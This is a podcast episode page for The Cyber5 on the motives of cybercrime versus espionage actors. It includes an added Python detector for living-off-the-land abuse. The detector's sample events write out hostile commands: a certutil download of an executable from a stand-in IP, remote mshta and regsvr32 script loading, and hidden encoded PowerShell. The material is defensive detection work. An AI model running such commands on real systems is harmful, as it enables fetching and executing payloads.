
Content provided by Nisos, Inc. All podcast content, including episodes, artwork and podcast descriptions, is uploaded and provided directly by Nisos, Inc. or their podcast platform partner. If you believe someone is using your copyrighted work without your permission, you can follow the process described at https://nl.player.fm/legal.

Different Motivations Between Espionage and Crime Actors

Duration: 27:43

In episode 45 of The Cyber5, we are joined by John Grim. John is the head of research, development, and innovation for Verizon's Threat Research Advisory Center. In this episode, we discuss the differences between threat actors who engage in cybercrime and those who conduct nation state espionage. We explore their motivations around computer network exploitation and how threat models for these actors need to be adapted to enterprise security and IT.

5 Topics Covered in this Episode:

1. Motivations of Cyber Crime versus Espionage Actors: (01:30 - 08:00)

According to a Verizon study from late 2020 covering a seven-year period, financially motivated threat actors were responsible for 76% of breaches, while espionage actors were responsible for 18%. Payment card (PCI) attacks, business email compromise, and fraud (such as COVID-19 scams) were more prevalent than advanced attacks. Of the 18% of breaches attributed to espionage actors, 57% hit manufacturing, mining, utilities, and the public sector, the industries most exposed to espionage threat actors. Financial services, insurance, retail, and healthcare, by contrast, are mostly targeted by financially motivated organized crime. The vectors most used by both kinds of actor (nation state or criminal) were social engineering through phishing and credential theft, plus backdoor access through applications. A major difference, however, is that most espionage cases involved "living off the land" (LOL, also written LOTL): using native Windows commands and pre-installed system tools (PowerShell, WMI, certutil and the like) rather than dropping custom malware, so that the activity blends into ordinary log entries. Those same built-in tools are then used to fetch payloads, execute code, and spread through the environment.

2. Defending Against Cyber Crime and Espionage for the CISO: Understanding Environment and Threat Modeling (08:00 - 12:16)

The number one discovery method for breaches, according to Verizon, was investigating suspicious traffic. A two-part, multi-step strategy should be implemented to protect the crown jewels and alert on suspicious traffic. The first part is understanding your own environment:

Step 1) Identify critical data and the assets that hold that data;

Step 2) Ensure network devices are configured and patched properly;

Step 3) Restrict access.

Defenders need to understand their environment and have tooling that flags anomalies in suspicious activity, especially since so much of it may consist of native Windows commands (living off the land) that look legitimate when each one is viewed in isolation.
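As an added illustration of the point made in topics 1 and 2 (this is example code written for this page, not a Verizon, Nisos or podcast tool), here is the kind of rule logic a defender would run over process-creation telemetry to surface living-off-the-land activity. The sample events are constructed for the example and shaped loosely like Sysmon Event ID 1 or Windows Security 4688 records; hostnames, paths and IPs are invented, and the rule patterns are illustrative starting points rather than a complete ruleset. The design choice the code makes explicit is that the binary alone (powershell.exe, certutil.exe) is not the signal: the argument shape and the parent/child relationship are what separate abuse from everyday administration.

```python
import re
from dataclasses import dataclass

# Constructed sample events for this example, shaped loosely like the fields
# in a Sysmon Event ID 1 or Windows Security 4688 process-creation record.
# Hostnames, paths and IPs are invented.
SAMPLE_EVENTS = [
    {"host": "ws-042", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem"},
    {"host": "ws-042", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"host": "srv-db1", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\Users\Public\a.exe"},
    {"host": "srv-db1", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -verify C:\certs\intranet.cer"},
    {"host": "ws-017", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://198.51.100.7/p.hta"},
    {"host": "ws-017", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll"},
]


@dataclass
class Finding:
    host: str
    rule: str
    image: str
    cmdline: str


def _cmd_re(pattern):
    """Build a predicate that is true when the command line matches pattern."""
    rx = re.compile(pattern, re.I)
    return lambda cmd: rx.search(cmd) is not None


def _has_encoded_command(cmd):
    """powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...)
    plus the documented alias -ec, so a literal '-enc' string match misses variants."""
    for tok in cmd.split():
        if tok[:1] in ("-", "/") and len(tok) > 1:
            switch = tok[1:].lower()
            if switch == "ec" or "encodedcommand".startswith(switch):
                return True
    return False


# Each rule: (name, image basename pattern, predicate over the command line).
# Matching the binary alone is not a detection: powershell.exe and certutil.exe
# run legitimately all day. The argument shape is what flags abuse.
LOLBIN_RULES = [
    ("powershell_encoded_command", r"^(powershell|pwsh)\.exe$", _has_encoded_command),
    ("certutil_download", r"^certutil\.exe$", _cmd_re(r"-urlcache\b.*\bhttps?://")),
    ("certutil_decode", r"^certutil\.exe$", _cmd_re(r"-decode\b")),
    ("mshta_remote_script", r"^mshta\.exe$", _cmd_re(r"\b(https?|javascript|vbscript):")),
    ("regsvr32_squiblydoo", r"^regsvr32\.exe$", _cmd_re(r"/i:https?://")),
    ("rundll32_script", r"^rundll32\.exe$", _cmd_re(r"\b(javascript|vbscript):")),
    ("bitsadmin_transfer", r"^bitsadmin\.exe$", _cmd_re(r"/transfer\b")),
    ("wmic_remote_process", r"^wmic\.exe$", _cmd_re(r"process\s+call\s+create")),
]

# Parent/child anomaly: an Office document spawning a script host is the
# classic phishing-to-execution step, whatever the arguments look like.
OFFICE_PARENTS = re.compile(r"^(winword|excel|powerpnt|outlook)\.exe$", re.I)
SCRIPT_HOSTS = re.compile(r"^(powershell|pwsh|cmd|wscript|cscript|mshta)\.exe$", re.I)


def basename(path):
    """Last path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def evaluate(event):
    """Return the list of Findings raised by a single process-creation event."""
    findings = []
    image = basename(event["image"])
    parent = basename(event["parent"])
    cmd = event["cmdline"]
    for name, image_pattern, predicate in LOLBIN_RULES:
        if re.match(image_pattern, image, re.I) and predicate(cmd):
            findings.append(Finding(event["host"], name, image, cmd))
    if OFFICE_PARENTS.match(parent) and SCRIPT_HOSTS.match(image):
        findings.append(Finding(event["host"], "office_spawns_script_host", image, cmd))
    return findings


def scan(events):
    """Run every event through the rules and collect the findings."""
    findings = []
    for event in events:
        findings.extend(evaluate(event))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host:8} {f.rule:28} {f.image:16} {f.cmdline}")
```

Run against the constructed sample, the two benign events (an interactive PowerShell listing and a certutil certificate check) raise nothing, while the Word-spawned encoded PowerShell raises two findings, one for the argument pattern and one for the parent/child pair. In production the same rules would be fed from a SIEM or EDR query rather than an in-memory list, and each rule would be tuned against the baseline of what administrators in that environment actually run.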

The second part of the strategy is threat modeling against the actors likely to attack your environment, using intelligence sources to build the appropriate defenses and controls.

3. Evolution of Threat Intelligence Driving Investigations: (12:16 - 15:30)

Over the last five years, threat intelligence has evolved through three stages:

  1. In the early days of threat intelligence, forensic artifacts (indicators of compromise, or IOCs) were shared to tip off network defenders to known signatures of an attacker already present in the organization's environment.
  2. Tactics, techniques, and procedures (TTPs) observed outside the organization's environment are now actively shared to give context on the attackers' modus operandi, with dark web and open source threat hunters going outside the wire to gather information that could be used in a breach.
  3. Intelligence now drives the investigation directly, which is what prevents an incident from becoming a breach.

4. Threat Models for Cyber Crime and Espionage Differ, But Overlap: (18:47 - 21:00)

In espionage attacks, desktops, laptops, and mobile phones are the assets targeted most often. For financially motivated attackers the targeted assets vary far more, including web application servers, customers and their devices, and the employee devices already mentioned. For compromising the integrity of data systems, tampering with software installation (as in the SolarWinds third-party supply chain compromise) was the number one attribute shared by financial and espionage actors. Secure configuration of software, hardware, applications, and network devices is the most important remediation effort.

5. Embracing Business Terms Important to CEOs and Executive Leaders: (21:00 - 26:00)

Security leaders need to write reports and convey technical findings in terms of risk to the business and its ability to generate revenue. Data breaches have become more complex over the years, and they are even harder to follow for stakeholders outside security and IT, particularly HR, legal, and finance. Breaking technical findings and threat actor capabilities down so that they make sense at different levels of the business is the biggest adjustment the security industry needs to make.


91 episodes

